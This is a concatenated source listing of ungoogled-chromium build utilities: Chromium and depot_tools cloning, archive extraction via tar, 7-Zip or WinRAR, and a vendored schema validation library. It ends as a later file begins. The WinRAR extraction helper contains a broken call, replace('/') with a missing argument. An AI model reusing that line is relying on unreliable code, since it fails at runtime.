make_domsub_script.py, part of the ungoogled-chromium project: # https://github.com/ungoogled-software/ungoogled-chromium.git # # Check that we are inside the Chromium source tree test -f build/config/compiler/BUILD.gn # These filenames may contain spaces and/or other unusual characters print_file_list() { cat <<'__END__' %s __END__ } echo "Creating backup archive ..." backup=domain-substitution.orig.tar print_file_list | tar cf $backup --verbatim-files-from --files-from=- echo "Applying ungoogled-chromium domain substitution to %d files ..." print_file_list | xargs -d '\\n' perl -0777 -C0 -pwi -e ' %s ' # end """ % (files_list_str, len(files_list), perl_replace_list_str)) def _callback(args): """CLI Callback""" make_domain_substitution_script(args.regex, args.files, args.output) def main(): """CLI Entrypoint""" parser = argparse.ArgumentParser() parser.set_defaults(callback=_callback) parser.add_argument('-r', '--regex', type=Path, required=True, help='Path to domain_regex.list') parser.add_argument('-f', '--files', type=Path, required=True, help='Path to domain_substitution.list') parser.add_argument('-o', '--output', type=Path, required=True, help='Path to script file to create') args = parser.parse_args() args.callback(args) if __name__ == '__main__': main() File: utils/clone.py #!/usr/bin/env python3 # -*- coding: UTF-8 -*- # Copyright (c) 2023 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ Module for cloning the source tree. """ import re import sys from argparse import ArgumentParser from os import environ, pathsep from pathlib import Path from shutil import copytree, copy, move from stat import S_IWRITE from subprocess import run from _common import add_common_params, get_chromium_version, get_logger from prune_binaries import CONTINGENT_PATHS # Config file for gclient # Instances of 'src' replaced with UC_OUT, which will be replaced with the output directory # custom_deps are set to None since they are large and unused # target_* arguments set to match tarball rather than actual build target GC_CONFIG = """\ solutions = [ { "name": "UC_OUT", "url": "https://chromium.googlesource.com/chromium/src.git", "managed": False, "custom_deps": { "UC_OUT/third_party/angle/third_party/VK-GL-CTS/src": None, "UC_OUT/third_party/instrumented_libs": None, }, "custom_vars": { "checkout_configuration": "small", "non_git_source": "False", }, }, ]; target_os = ['unix']; target_os_only = True; target_cpu = ['x64']; target_cpu_only = True; """ def clone(args): # pylint: disable=too-many-branches, too-many-statements """Clones, downloads, and generates the required sources""" get_logger().info('Setting up cloning environment') iswin = sys.platform.startswith('win') chromium_version = get_chromium_version() ucstaging = args.output / 'uc_staging' dtpath = ucstaging / 'depot_tools' gnpath = ucstaging / 'gn' environ['GCLIENT_FILE'] = str(ucstaging / '.gclient') environ['PATH'] += pathsep + str(dtpath) environ['PYTHONPATH'] = str(dtpath) # Prevent gclient from auto updating depot_tools environ['DEPOT_TOOLS_UPDATE'] = '0' # Don't generate pycache files environ['PYTHONDONTWRITEBYTECODE'] = '1' # Allow usage of system python environ['VPYTHON_BYPASS'] = 'manually managed python not supported by chrome operations' # Google has some regex strings that aren't escaped properly or set as raw environ["PYTHONWARNINGS"] = "ignore::SyntaxWarning" # depth=2 since generating LASTCHANGE and gpu_lists_version.h require at least two commits get_logger().info('Cloning chromium source: %s', chromium_version) if (args.output / '.git').exists(): run(['git', 'fetch', 'origin', 'tag', chromium_version, '--depth=2'], cwd=args.output, check=True) run(['git', 'reset', '--hard', 'FETCH_HEAD'], cwd=args.output, check=True) run(['git', 'clean', '-ffdx', '-e', 'uc_staging'], cwd=args.output, check=True) else: run([ 'git', 'clone', '-c', 'advice.detachedHead=false', '-b', chromium_version, '--depth=2', "https://chromium.googlesource.com/chromium/src", str(args.output) ], check=True) # Set up staging directory ucstaging.mkdir(exist_ok=True) get_logger().info('Cloning depot_tools') dt_commit = re.search(r"depot_tools\.git'\s*\+\s*'@'\s*\+\s*'([^']+)',", Path(args.output / 'DEPS').read_text()).group(1) if not dt_commit: get_logger().error('Unable to obtain commit for depot_tools checkout') sys.exit(1) if not dtpath.exists(): dtpath.mkdir() run(['git', 'init', '-q'], cwd=dtpath, check=True) run([ 'git', 'remote', 'add', 'origin', 'https://chromium.googlesource.com/chromium/tools/depot_tools' ], cwd=dtpath, check=True) run(['git', 'fetch', '--depth=1', 'origin', dt_commit], cwd=dtpath, check=True) run(['git', 'reset', '--hard', dt_commit], cwd=dtpath, check=True) run(['git', 'clean', '-ffdx'], cwd=dtpath, check=True) if iswin: (dtpath / 'git.bat').write_text('git') # Apply changes to gclient run(['git', 'apply'], input=Path(__file__).with_name('depot_tools.patch').read_text().replace( 'UC_OUT', str(args.output)).replace('UC_STAGING', str(ucstaging)), cwd=dtpath, check=True, universal_newlines=True) # gn requires full history to be able to generate last_commit_position.h get_logger().info('Cloning gn') if gnpath.exists(): run(['git', 'fetch'], cwd=gnpath, check=True) run(['git', 'reset', '--hard', 'FETCH_HEAD'], cwd=gnpath, check=True) run(['git', 'clean', '-ffdx'], cwd=gnpath, check=True) else: run(['git', 'clone', "https://gn.googlesource.com/gn", str(gnpath)], check=True) get_logger().info('Running gsync') if args.custom_config: copy(args.custom_config, ucstaging / '.gclient').replace('UC_OUT', str(args.output)) else: (ucstaging / '.gclient').write_text(GC_CONFIG.replace('UC_OUT', str(args.output))) gcpath = dtpath / 'gclient' if iswin: gcpath = gcpath.with_suffix('.bat') # -f, -D, and -R forces a hard reset on changes and deletes deps that have been removed run([ str(gcpath), 'sync', '-f', '-D', '-R', '--no-history', '--nohooks', f'--sysroot={args.sysroot}' ], check=True) # Follow tarball procedure: # https://source.chromium.org/chromium/chromium/tools/build/+/main:recipes/recipes/publish_tarball.py get_logger().info('Downloading pgo profiles') run([ sys.executable, str(args.output / 'tools' / 'update_pgo_profiles.py'), '--target=' + args.pgo, 'update', '--gs-url-base=chromium-optimization-profiles/pgo_profiles' ], check=True) # https://chromium-review.googlesource.com/c/chromium/tools/build/+/4380399 run([ sys.executable, str(args.output / 'v8' / 'tools' / 'builtins-pgo' / 'download_profiles.py'), 'download', '--depot-tools', str(dtpath) ], check=True) get_logger().info('Generating: DAWN_VERSION') run([ sys.executable, str(args.output / 'build' / 'util' / 'lastchange.py'), '-s', str(args.output / 'third_party' / 'dawn'), '--revision', str(args.output / 'gpu' / 'webgpu' / 'DAWN_VERSION') ], check=True) get_logger().info('Generating: LASTCHANGE') run([ sys.executable, str(args.output / 'build' / 'util' / 'lastchange.py'), '-o', str(args.output / 'build' / 'util' / 'LASTCHANGE') ], check=True) get_logger().info('Generating: gpu_lists_version.h') run([ sys.executable, str(args.output / 'build' / 'util' / 'lastchange.py'), '-m', 'GPU_LISTS_VERSION', '--revision-id-only', '--header', str(args.output / 'gpu' / 'config' / 'gpu_lists_version.h') ], check=True) get_logger().info('Generating: skia_commit_hash.h') run([ sys.executable, str(args.output / 'build' / 'util' / 'lastchange.py'), '-m', 'SKIA_COMMIT_HASH', '-s', str(args.output / 'third_party' / 'skia'), '--header', str(args.output / 'skia' / 'ext' / 'skia_commit_hash.h') ], check=True) get_logger().info('Generating: last_commit_position.h') run([sys.executable, str(gnpath / 'build' / 'gen.py')], check=True) for item in gnpath.iterdir(): if not item.is_dir(): copy(item, args.output / 'tools' / 'gn') elif item.name != '.git' and item.name != 'out': copytree(item, args.output / 'tools' / 'gn' / item.name) move(str(gnpath / 'out' / 'last_commit_position.h'), str(args.output / 'tools' / 'gn' / 'bootstrap')) get_logger().info('Removing uneeded files') # Match removals for the tarball: # https://source.chromium.org/chromium/chromium/tools/build/+/main:recipes/recipe_modules/chromium/resources/export_tarball.py remove_dirs = ( (args.output / 'chrome' / 'test' / 'data'), (args.output / 'content' / 'test' / 'data'), (args.output / 'courgette' / 'testdata'), (args.output / 'extensions' / 'test' / 'data'), (args.output / 'media' / 'test' / 'data'), (args.output / 'native_client' / 'src' / 'trusted' / 'service_runtime' / 'testdata'), (args.output / 'third_party' / 'blink' / 'tools'), (args.output / 'third_party' / 'blink' / 'web_tests'), (args.output / 'third_party' / 'breakpad' / 'breakpad' / 'src' / 'processor' / 'testdata'), (args.output / 'third_party' / 'catapult' / 'tracing' / 'test_data'), (args.output / 'third_party' / 'hunspell' / 'tests'), (args.output / 'third_party' / 'hunspell_dictionaries'), (args.output / 'third_party' / 'jdk' / 'current'), (args.output / 'third_party' / 'jdk' / 'extras'), (args.output / 'third_party' / 'liblouis' / 'src' / 'tests' / 'braille-specs'), (args.output / 'third_party' / 'xdg-utils' / 'tests'), (args.output / 'v8' / 'test'), ) keep_files = ( (args.output / 'chrome' / 'test' / 'data' / 'webui' / 'i18n_process_css_test.html'), (args.output / 'chrome' / 'test' / 'data' / 'webui' / 'mojo' / 'foobar.mojom'), (args.output / 'chrome' / 'test' / 'data' / 'webui' / 'web_ui_test.mojom'), (args.output / 'v8' / 'test' / 'torque' / 'test-torque.tq'), ) keep_suffix = ('.gn', '.gni', '.grd', '.gyp', '.isolate', '.pydeps') # Include Contingent Paths for cpath in CONTINGENT_PATHS: if args.sysroot and f'{args.sysroot}-sysroot' in cpath: continue remove_dirs += (args.output / Path(cpath), ) for remove_dir in remove_dirs: for path in sorted(remove_dir.rglob('*'), key=lambda l: len(str(l)), reverse=True): if path.is_file() and path not in keep_files and path.suffix not in keep_suffix: try: path.unlink() # read-only files can't be deleted on Windows # so remove the flag and try again. except PermissionError: path.chmod(S_IWRITE) path.unlink() elif path.is_dir() and not any(path.iterdir()): try: path.rmdir() except PermissionError: path.chmod(S_IWRITE) path.rmdir() for path in sorted(args.output.rglob('*'), key=lambda l: len(str(l)), reverse=True): if not path.is_symlink() and '.git' not in path.parts: if path.is_file() and ('out' in path.parts or path.name.startswith('ChangeLog')): try: path.unlink() except PermissionError: path.chmod(S_IWRITE) path.unlink() elif path.is_dir() and not any(path.iterdir()): try: path.rmdir() except PermissionError: path.chmod(S_IWRITE) path.rmdir() get_logger().info('Source cloning complete') def main(): """CLI Entrypoint""" parser = ArgumentParser(description=__doc__) parser.add_argument('-o', '--output', type=Path, metavar='DIRECTORY', default='chromium', help='Output directory for the cloned sources. Default: %(default)s') parser.add_argument('-c', '--custom-config', type=Path, metavar='FILE', help='Supply a replacement for the default gclient config.') parser.add_argument('-p', '--pgo', default='linux', choices=('linux', 'mac', 'mac-arm', 'win32', 'win64'), help='Specifiy which pgo profile to download. Default: %(default)s') parser.add_argument('-s', '--sysroot', choices=('amd64', 'arm64', 'armhf', 'i386', 'mips64el', 'mipsel'), help='Download a linux sysroot for the given architecture') add_common_params(parser) args = parser.parse_args() clone(args) if __name__ == '__main__': main() File: utils/_extraction.py # -*- coding: UTF-8 -*- # Copyright (c) 2019 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ Archive extraction utilities """ import os import shutil import subprocess import tarfile from pathlib import Path, PurePosixPath from _common import (USE_REGISTRY, PlatformEnum, ExtractorEnum, get_logger, get_running_platform) from prune_binaries import CONTINGENT_PATHS DEFAULT_EXTRACTORS = { ExtractorEnum.SEVENZIP: USE_REGISTRY, ExtractorEnum.TAR: 'tar', ExtractorEnum.WINRAR: USE_REGISTRY, } def _find_7z_by_registry(): """ Return a string to 7-zip's 7z.exe from the Windows Registry. """ import winreg #pylint: disable=import-error, import-outside-toplevel sub_key_7zfm = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\7zFM.exe' try: with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, sub_key_7zfm) as key_handle: sevenzipfm_dir = winreg.QueryValueEx(key_handle, 'Path')[0] except OSError: get_logger().exception('Unable to locate 7-zip from the Windows Registry') raise sevenzip_path = Path(sevenzipfm_dir, '7z.exe') if not sevenzip_path.is_file(): get_logger().error('7z.exe not found at path from registry: %s', sevenzip_path) return sevenzip_path def _find_winrar_by_registry(): """ Return a string to WinRAR's WinRAR.exe from the Windows Registry. """ import winreg #pylint: disable=import-error, import-outside-toplevel sub_key_winrar = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\WinRAR.exe' try: with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, sub_key_winrar) as key_handle: winrar_dir = winreg.QueryValueEx(key_handle, 'Path')[0] except OSError: get_logger().exception('Unable to locale WinRAR from the Windows Registry') raise winrar_path = Path(winrar_dir, 'WinRAR.exe') if not winrar_path.is_file(): get_logger().error('WinRAR.exe not found at path from registry: %s', winrar_path) return winrar_path def _find_extractor_by_cmd(extractor_cmd): """Returns a string path to the binary; None if it couldn't be found""" if not extractor_cmd: return None if Path(extractor_cmd).is_file(): return extractor_cmd return shutil.which(extractor_cmd) def _process_relative_to(unpack_root, relative_to): """ For an extractor that doesn't support an automatic transform, move the extracted contents from the relative_to/ directory to the unpack_root If relative_to is None, nothing is done. """ if relative_to is None: return relative_root = unpack_root / relative_to if not relative_root.is_dir(): get_logger().error('Could not find relative_to directory in extracted files: %s', relative_to) raise Exception() for src_path in relative_root.iterdir(): dest_path = unpack_root / src_path.name src_path.rename(dest_path) relative_root.rmdir() def _extract_tar_with_7z(binary, archive_path, output_dir, relative_to, skip_unused, sysroot): get_logger().debug('Using 7-zip extractor') if not relative_to is None and (output_dir / relative_to).exists(): get_logger().error('Temporary unpacking directory already exists: %s', output_dir / relative_to) raise Exception() cmd1 = (binary, 'x', str(archive_path), '-so') cmd2 = (binary, 'x', '-si', '-aoa', '-ttar', '-o{}'.format(str(output_dir))) if skip_unused: for cpath in CONTINGENT_PATHS: if sysroot and f'{sysroot}-sysroot' in cpath: continue cmd2 += ('-x!%s/%s' % (str(relative_to), cpath[:-1]), ) get_logger().debug('7z command line: %s | %s', ' '.join(cmd1), ' '.join(cmd2)) proc1 = subprocess.Popen(cmd1, stdout=subprocess.PIPE) proc2 = subprocess.Popen(cmd2, stdin=proc1.stdout, stdout=subprocess.PIPE) proc1.stdout.close() (stdout_data, stderr_data) = proc2.communicate() if proc2.returncode != 0: get_logger().error('7z commands returned non-zero status: %s', proc2.returncode) get_logger().debug('stdout: %s', stdout_data) get_logger().debug('stderr: %s', stderr_data) raise Exception() _process_relative_to(output_dir, relative_to) def _extract_tar_with_tar(binary, archive_path, output_dir, relative_to, skip_unused, sysroot): get_logger().debug('Using BSD or GNU tar extractor') output_dir.mkdir(exist_ok=True) cmd = (binary, '-xf', str(archive_path), '-C', str(output_dir)) if skip_unused: for cpath in CONTINGENT_PATHS: if sysroot and f'{sysroot}-sysroot' in cpath: continue cmd += ('--exclude=%s/%s' % (str(relative_to), cpath[:-1]), ) get_logger().debug('tar command line: %s', ' '.join(cmd)) result = subprocess.run(cmd, check=False) if result.returncode != 0: get_logger().error('tar command returned %s', result.returncode) raise Exception() # for gnu tar, the --transform option could be used. but to keep compatibility with # bsdtar on macos, we just do this ourselves _process_relative_to(output_dir, relative_to) def _extract_tar_with_winrar(binary, archive_path, output_dir, relative_to, skip_unused, sysroot): get_logger().debug('Using WinRAR extractor') output_dir.mkdir(exist_ok=True) cmd = (binary, 'x', '-o+', str(archive_path), str(output_dir)) if skip_unused: for cpath in CONTINGENT_PATHS: if sysroot and f'{sysroot}-sysroot' in cpath: continue cmd += ('-x%s%s%s' % (str(relative_to), os.sep, cpath[:-1].replace('/')), ) get_logger().debug('WinRAR command line: %s', ' '.join(cmd)) result = subprocess.run(cmd, check=False) if result.returncode != 0: get_logger().error('WinRAR command returned %s', result.returncode) raise Exception() _process_relative_to(output_dir, relative_to) def _extract_tar_with_python(archive_path, output_dir, relative_to, skip_unused, sysroot): get_logger().debug('Using pure Python tar extractor') class NoAppendList(list): """Hack to workaround memory issues with large tar files""" def append(self, obj): pass # Simple hack to check if symlinks are supported try: os.symlink('', '') except FileNotFoundError: # Symlinks probably supported symlink_supported = True except OSError: # Symlinks probably not supported get_logger().info('System does not support symlinks. Ignoring them.') symlink_supported = False except BaseException: # Unexpected exception get_logger().exception('Unexpected exception during symlink support check.') raise with tarfile.open(str(archive_path), 'r|%s' % archive_path.suffix[1:]) as tar_file_obj: tar_file_obj.members = NoAppendList() for tarinfo in tar_file_obj: try: if skip_unused and [ cpath for cpath in CONTINGENT_PATHS if tarinfo.name.startswith(str(relative_to) + '/' + cpath) and not (sysroot and f'{sysroot}-sysroot' in cpath) ]: continue if relative_to is None: destination = output_dir / PurePosixPath(tarinfo.name) else: destination = output_dir / PurePosixPath(tarinfo.name).relative_to(relative_to) if tarinfo.issym() and not symlink_supported: # In this situation, TarFile.makelink() will try to create a copy of the # target. But this fails because TarFile.members is empty # But if symlinks are not supported, it's safe to assume that symlinks # aren't needed. The only situation where this happens is on Windows. continue if tarinfo.islnk(): # Derived from TarFile.extract() new_target = output_dir / PurePosixPath( tarinfo.linkname).relative_to(relative_to) tarinfo._link_target = new_target.as_posix() # pylint: disable=protected-access if destination.is_symlink(): destination.unlink() tar_file_obj._extract_member(tarinfo, str(destination)) # pylint: disable=protected-access except BaseException: get_logger().exception('Exception thrown for tar member: %s', tarinfo.name) raise def extract_tar_file(archive_path, output_dir, relative_to, skip_unused, sysroot, extractors=None): """ Extract regular or compressed tar archive into the output directory. archive_path is the pathlib.Path to the archive to unpack output_dir is a pathlib.Path to the directory to unpack. It must already exist. relative_to is a pathlib.Path for directories that should be stripped relative to the root of the archive, or None if no path components should be stripped. extractors is a dictionary of PlatformEnum to a command or path to the extractor binary. Defaults to 'tar' for tar, and '_use_registry' for 7-Zip and WinRAR. """ if extractors is None: extractors = DEFAULT_EXTRACTORS current_platform = get_running_platform() if current_platform == PlatformEnum.WINDOWS: # Try to use 7-zip first sevenzip_cmd = extractors.get(ExtractorEnum.SEVENZIP) if sevenzip_cmd == USE_REGISTRY: sevenzip_cmd = str(_find_7z_by_registry()) sevenzip_bin = _find_extractor_by_cmd(sevenzip_cmd) if sevenzip_bin is not None: _extract_tar_with_7z(sevenzip_bin, archive_path, output_dir, relative_to, skip_unused, sysroot) return # Use WinRAR if 7-zip is not found winrar_cmd = extractors.get(ExtractorEnum.WINRAR) if winrar_cmd == USE_REGISTRY: winrar_cmd = str(_find_winrar_by_registry()) winrar_bin = _find_extractor_by_cmd(winrar_cmd) if winrar_bin is not None: _extract_tar_with_winrar(winrar_bin, archive_path, output_dir, relative_to, skip_unused, sysroot) return get_logger().warning( 'Neither 7-zip nor WinRAR were found. Falling back to Python extractor...') elif current_platform == PlatformEnum.UNIX: # NOTE: 7-zip isn't an option because it doesn't preserve file permissions tar_bin = _find_extractor_by_cmd(extractors.get(ExtractorEnum.TAR)) if not tar_bin is None: _extract_tar_with_tar(tar_bin, archive_path, output_dir, relative_to, skip_unused, sysroot) return else: # This is not a normal code path, so make it clear. raise NotImplementedError(current_platform) # Fallback to Python-based extractor on all platforms _extract_tar_with_python(archive_path, output_dir, relative_to, skip_unused, sysroot) def extract_with_7z(archive_path, output_dir, relative_to, skip_unused, sysroot, extractors=None): """ Extract archives with 7-zip into the output directory. Only supports archives with one layer of unpacking, so compressed tar archives don't work. archive_path is the pathlib.Path to the archive to unpack output_dir is a pathlib.Path to the directory to unpack. It must already exist. relative_to is a pathlib.Path for directories that should be stripped relative to the root of the archive. extractors is a dictionary of PlatformEnum to a command or path to the extractor binary. Defaults to 'tar' for tar, and '_use_registry' for 7-Zip. """ # TODO: It would be nice to extend this to support arbitrary standard IO chaining of 7z # instances, so _extract_tar_with_7z and other future formats could use this. if extractors is None: extractors = DEFAULT_EXTRACTORS sevenzip_cmd = extractors.get(ExtractorEnum.SEVENZIP) if sevenzip_cmd == USE_REGISTRY: if not get_running_platform() == PlatformEnum.WINDOWS: get_logger().error('"%s" for 7-zip is only available on Windows', sevenzip_cmd) raise Exception() sevenzip_cmd = str(_find_7z_by_registry()) sevenzip_bin = _find_extractor_by_cmd(sevenzip_cmd) if not relative_to is None and (output_dir / relative_to).exists(): get_logger().error('Temporary unpacking directory already exists: %s', output_dir / relative_to) raise Exception() cmd = (sevenzip_bin, 'x', str(archive_path), '-aoa', '-o{}'.format(str(output_dir))) if skip_unused: for cpath in CONTINGENT_PATHS: if sysroot and f'{sysroot}-sysroot' in cpath: continue cmd += ('-x!%s/%s' % (str(relative_to), cpath[:-1]), ) get_logger().debug('7z command line: %s', ' '.join(cmd)) result = subprocess.run(cmd, check=False) if result.returncode != 0: get_logger().error('7z command returned %s', result.returncode) raise Exception() _process_relative_to(output_dir, relative_to) def extract_with_winrar(archive_path, output_dir, relative_to, skip_unused, sysroot, extractors=None): """ Extract archives with WinRAR into the output directory. Only supports archives with one layer of unpacking, so compressed tar archives don't work. archive_path is the pathlib.Path to the archive to unpack output_dir is a pathlib.Path to the directory to unpack. It must already exist. relative_to is a pathlib.Path for directories that should be stripped relative to the root of the archive. extractors is a dictionary of PlatformEnum to a command or path to the extractor binary. Defaults to 'tar' for tar, and '_use_registry' for WinRAR. """ if extractors is None: extractors = DEFAULT_EXTRACTORS winrar_cmd = extractors.get(ExtractorEnum.WINRAR) if winrar_cmd == USE_REGISTRY: if not get_running_platform() == PlatformEnum.WINDOWS: get_logger().error('"%s" for WinRAR is only available on Windows', winrar_cmd) raise Exception() winrar_cmd = str(_find_winrar_by_registry()) winrar_bin = _find_extractor_by_cmd(winrar_cmd) if not relative_to is None and (output_dir / relative_to).exists(): get_logger().error('Temporary unpacking directory already exists: %s', output_dir / relative_to) raise Exception() cmd = (winrar_bin, 'x', '-o+', str(archive_path), str(output_dir)) if skip_unused: for cpath in CONTINGENT_PATHS: if sysroot and f'{sysroot}-sysroot' in cpath: continue cmd += ('-x%s%s%s' % (str(relative_to), os.sep, cpath[:-1].replace('/', os.sep)), ) get_logger().debug('WinRAR command line: %s', ' '.join(cmd)) result = subprocess.run(cmd, check=False) if result.returncode != 0: get_logger().error('WinRAR command returned %s', result.returncode) raise Exception() _process_relative_to(output_dir, relative_to) File: utils/third_party/__init__.py File: utils/third_party/schema.py """schema is a library for validating Python data structures, such as those obtained from config-files, forms, external services or command-line parsing, converted from JSON/YAML (or something else) to Python data-types.""" import re __version__ = '0.6.7' __all__ = ['Schema', 'And', 'Or', 'Regex', 'Optional', 'Use', 'Forbidden', 'Const', 'SchemaError', 'SchemaWrongKeyError', 'SchemaMissingKeyError', 'SchemaForbiddenKeyError', 'SchemaUnexpectedTypeError'] class SchemaError(Exception): """Error during Schema validation.""" def __init__(self, autos, errors=None): self.autos = autos if type(autos) is list else [autos] self.errors = errors if type(errors) is list else [errors] Exception.__init__(self, self.code) @property def code(self): """ Removes duplicates values in auto and error list. parameters. """ def uniq(seq): """ Utility function that removes duplicate. """ seen = set() seen_add = seen.add # This way removes duplicates while preserving the order. return [x for x in seq if x not in seen and not seen_add(x)] data_set = uniq(i for i in self.autos if i is not None) error_list = uniq(i for i in self.errors if i is not None) if error_list: return '\n'.join(error_list) return '\n'.join(data_set) class SchemaWrongKeyError(SchemaError): """Error Should be raised when an unexpected key is detected within the data set being.""" pass class SchemaMissingKeyError(SchemaError): """Error should be raised when a mandatory key is not found within the data set being vaidated""" pass class SchemaForbiddenKeyError(SchemaError): """Error should be raised when a forbidden key is found within the data set being validated, and its value matches the value that was specified""" pass class SchemaUnexpectedTypeError(SchemaError): """Error should be raised when a type mismatch is detected within the data set being validated.""" pass class And: """ Utility function to combine validation directives in AND Boolean fashion. """ def __init__(self, *args, **kw): self._args = args assert set(kw).issubset(['error', 'schema', 'ignore_extra_keys']) self._error = kw.get('error') self._ignore_extra_keys = kw.get('ignore_extra_keys', False) # You can pass your inherited Schema class. self._schema = kw.get('schema', Schema) def __repr__(self): return '%s(%s)' % (self.__class__.__name__, ', '.join(repr(a) for a in self._args)) def validate(self, data): """ Validate data using defined sub schema/expressions ensuring all values are valid. :param data: to be validated with sub defined schemas. :return: returns validated data """ for s in [self._schema(s, error=self._error, ignore_extra_keys=self._ignore_extra_keys) for s in self._args]: data = s.validate(data) return data class Or(And): """Utility function to combine validation directives in a OR Boolean fashion.""" def validate(self, data): """ Validate data using sub defined schema/expressions ensuring at least one value is valid. :param data: data to be validated by provided schema. :return: return validated data if not validation """ x = SchemaError([], []) for s in [self._schema(s, error=self._error, ignore_extra_keys=self._ignore_extra_keys) for s in self._args]: try: return s.validate(data) except SchemaError as _x: x = _x raise SchemaError(['%r did not validate %r' % (self, data)] + x.autos, [self._error.format(data) if self._error else None] + x.errors) class Regex: """ Enables schema.py to validate string using regular expressions. """ # Map all flags bits to a more readable description NAMES = ['re.ASCII', 're.DEBUG', 're.VERBOSE', 're.UNICODE', 're.DOTALL', 're.MULTILINE', 're.LOCALE', 're.IGNORECASE', 're.TEMPLATE'] def __init__(self, pattern_str, flags=0, error=None): self._pattern_str = pattern_str flags_list = [Regex.NAMES[i] for i, f in # Name for each bit enumerate('{0:09b}'.format(flags)) if f != '0'] if flags_list: self._flags_names = ', flags=' + '|'.join(flags_list) else: self._flags_names = '' self._pattern = re.compile(pattern_str, flags=flags) self._error = error def __repr__(self): return '%s(%r%s)' % ( self.__class__.__name__, self._pattern_str, self._flags_names ) def validate(self, data): """ Validated data using defined regex. :param data: data to be validated :return: return validated data. """ e = self._error try: if self._pattern.search(data): return data else: raise SchemaError('%r does not match %r' % (self, data), e) except TypeError: raise SchemaError('%r is not string nor buffer' % data, e) class Use: """ For more general use cases, you can use the Use class to transform the data while it is being validate. """ def __init__(self, callable_, error=None): assert callable(callable_) self._callable = callable_ self._error = error def __repr__(self): return '%s(%r)' % (self.__class__.__name__, self._callable) def validate(self, data): try: return self._callable(data) except SchemaError as x: raise SchemaError([None] + x.autos, [self._error.format(data) if self._error else None] + x.errors) except BaseException as x: f = _callable_str(self._callable) raise SchemaError('%s(%r) raised %r' % (f, data, x), self._error.format(data) if self._error else None) COMPARABLE, CALLABLE, VALIDATOR, TYPE, DICT, ITERABLE = range(6) def _priority(s): """Return priority for a given object.""" if type(s) in (list, tuple, set, frozenset): return ITERABLE if type(s) is dict: return DICT if issubclass(type(s), type): return TYPE if hasattr(s, 'validate'): return VALIDATOR if callable(s): return CALLABLE else: return COMPARABLE class Schema: """ Entry point of the library, use this class to instantiate validation schema for the data that will be validated. """ def __init__(self, schema, error=None, ignore_extra_keys=False): self._schema = schema self._error = error self._ignore_extra_keys = ignore_extra_keys def __repr__(self): return '%s(%r)' % (self.__class__.__name__, self._schema) @staticmethod def _dict_key_priority(s): """Return priority for a given key object.""" if isinstance(s, Forbidden): return _priority(s._schema) - 0.5 if isinstance(s, Optional): return _priority(s._schema) + 0.5 return _priority(s) def validate(self, data): Schema = self.__class__ s = self._schema e = self._error i = self._ignore_extra_keys flavor = _priority(s) if flavor == ITERABLE: data = Schema(type(s), error=e).validate(data) o = Or(*s, error=e, schema=Schema, ignore_extra_keys=i) return type(data)(o.validate(d) for d in data) if flavor == DICT: data = Schema(dict, error=e).validate(data) new = type(data)() # new - is a dict of the validated values coverage = set() # matched schema keys # for each key and value find a schema entry matching them, if any sorted_skeys = sorted(s, key=self._dict_key_priority) for key, value in data.items(): for skey in sorted_skeys: svalue = s[skey] try: nkey = Schema(skey, error=e).validate(key) except SchemaError: pass else: if isinstance(skey, Forbidden): # As the content of the value makes little sense for # forbidden keys, we reverse its meaning: # we will only raise the SchemaErrorForbiddenKey # exception if the value does match, allowing for # excluding a key only if its value has a certain type, # and allowing Forbidden to work well in combination # with Optional. try: nvalue = Schema(svalue, error=e).validate(value) except SchemaError: continue raise SchemaForbiddenKeyError( 'Forbidden key encountered: %r in %r' % (nkey, data), e) try: nvalue = Schema(svalue, error=e, ignore_extra_keys=i).validate(value) except SchemaError as x: k = "Key '%s' error:" % nkey raise SchemaError([k] + x.autos, [e] + x.errors) else: new[nkey] = nvalue coverage.add(skey) break required = {k for k in s if type(k) not in [Optional, Forbidden]} if not required.issubset(coverage): missing_keys = required - coverage s_missing_keys = \ ', '.join(repr(k) for k in sorted(missing_keys, key=repr)) raise \ SchemaMissingKeyError('Missing keys: ' + s_missing_keys, e) if not self._ignore_extra_keys and (len(new) != len(data)): wrong_keys = set(data.keys()) - set(new.keys()) s_wrong_keys = \ ', '.join(repr(k) for k in sorted(wrong_keys, key=repr)) raise \ SchemaWrongKeyError( 'Wrong keys %s in %r' % (s_wrong_keys, data), e.format(data) if e else None) # Apply default-having optionals that haven't been used: defaults = {k for k in s if type(k) is Optional and hasattr(k, 'default')} - coverage for default in defaults: new[default.key] = default.default return new if flavor == TYPE: if isinstance(data, s): return data else: raise SchemaUnexpectedTypeError( '%r should be instance of %r' % (data, s.__name__), e.format(data) if e else None) if flavor == VALIDATOR: try: return s.validate(data) except SchemaError as x: raise SchemaError([None] + x.autos, [e] + x.errors) except BaseException as x: raise SchemaError( '%r.validate(%r) raised %r' % (s, data, x), self._error.format(data) if self._error else None) if flavor == CALLABLE: f = _callable_str(s) try: if s(data): return data except SchemaError as x: raise SchemaError([None] + x.autos, [e] + x.errors) except BaseException as x: raise SchemaError( '%s(%r) raised %r' % (f, data, x), self._error.format(data) if self._error else None) raise SchemaError('%s(%r) should evaluate to True' % (f, data), e) if s == data: return data else: raise SchemaError('%r does not match %r' % (s, data), e.format(data) if e else None) class Optional(Schema): """Marker for an optional part of the validation Schema.""" _MARKER = object() def __init__(self, *args, **kwargs): default = kwargs.pop('default', self._MARKER) super(Optional, self).__init__(*args, **kwargs) if default is not self._MARKER: # See if I can come up with a static key to use for myself: if _priority(self._schema) != COMPARABLE: raise TypeError( 'Optional keys with defaults must have simple, ' 'predictable values, like literal strings or ints. ' '"%r" is too complex.' % (self._schema,)) self.default = default self.key = self._schema def __hash__(self): return hash(self._schema) def __eq__(self, other): return (self.__class__ is other.__class__ and getattr(self, 'default', self._MARKER) == getattr(other, 'default', self._MARKER) and self._schema == other._schema) class Forbidden(Schema): def __init__(self, *args, **kwargs): super(Forbidden, self).__init__(*args, **kwargs) self.key = self._schema class Const(Schema): def validate(self, data): super(Const, self).validate(data) return data def _callable_str(callable_): if hasattr(callable_, '__name__'): return callable_.__name__ return str(callable_) File: devutils/validate_patches.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- # Copyright (c) 2020 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ Validates that all patches apply 